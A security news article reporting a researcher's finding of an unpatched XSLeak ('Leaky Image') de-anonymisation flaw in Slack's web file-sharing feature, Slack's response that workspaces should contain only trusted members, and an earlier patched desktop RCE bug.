XSLeak flaw in Slack could allow a malicious workspace member to launch de-anonymisation attacks

XSLeak flaw in Slack could allow a malicious workspace member to launch de-anonymisation attacks

Image:
XSLeak flaw in Slack could allow a malicious workspace member to launch de-anonymisation attacks

Slack says users can prevent such attacks by ensuring that everyone in their workspace is 'trusted'

A security researcher claims to have uncovered a cross-site leak (XSLeak) flaw in the file-sharing feature of Slack's web application which could enable threat actors to identify users outside of the workforce messaging platform, when victims visit the attacker's website in Chromium-based browsers.

Julien Cretel, who found the vulnerability, said in a blog post that the popular collaboration platform has no plans to patch the security hole, saying users can prevent such attacks by ensuring that everyone in their workspace is 'trusted'.

XSLeaks are a class of security vulnerabilities derived from side-channels built into the web platform. Such flaws exploit the web's core principle of composability, which enables websites to interact with each other, and abuse legitimate mechanisms to reveal sensitive information about the users.

In a paper published in 2019, researchers from TU Darmstadt detailed an XSLeak channel in image-sharing features of some popular messaging platforms, including Facebook, Twitter, Google, and Microsoft Live.

They explained that when users upload an image in their private chat threads, the host service generates a unique URL for that resource that is only accessible by parties within the thread. However, the researchers found that a malicious actor can abuse this mechanism to create a unique URL for a target user and then force the browsers of visitors to another website to request the same URL. Depending on browser's response, the attacker can determine if the visitor is the same user.

This technique can be used for fingerprinting or spear phishing attacks, they warned.

Cretel told The Daily Swig that when he checked the file-sharing functionality of Slack's web client, he found that it was vulnerable to "Leaky Image" attacks. But in order to exploit the security flaw, the attacker must have a user account in the same Slack workspace as their targets and be able to send them direct messages, he added.

Cretel said he had created a novel technique that enabled him to detect multiple Slack users.

The bug does not affect the mobile and desktop apps or non-Chromium browsers such as Safari and Firefox, according to the security researcher.

When Cretel notified Slack about the flaw, the platform declined to fix it, saying that Slack is a trusted workspace and "there is at least some implied measure of trust, or at least familiarity, between two users in a Slack Workspace".

A spokesperson for Slack told The Daily Swig that the "best way to prevent attacks between members of a workspace is to ensure everyone in your workspace is a trusted member or partner".

The spokesperson added that the platform provides each organisation "control over permissions to send invitations and tools to restrict membership as appropriate".

This is not the first instance that a security weakness has been uncovered in Slack.

Last year, the platform patched a critical remote code execution (RCE) vulnerability in its desktop app which could have allowed a remote attacker to take control over the app and steal users' confidential information from the device.

Oskars Vegeris, the security researcher who found the RCE bug, warned that malicious actors could create an exploit for the flaw to gain full remote control over the Slack desktop app and then enjoy access to private conversations, channels, passwords, keys and tokens, and various functions within the app.

Vegeris also found that emails, when sent as plaintext, are stored unfiltered on Slack servers. He warned that hackers could abuse this situation to store the RCE payload without requiring to own their own hosting.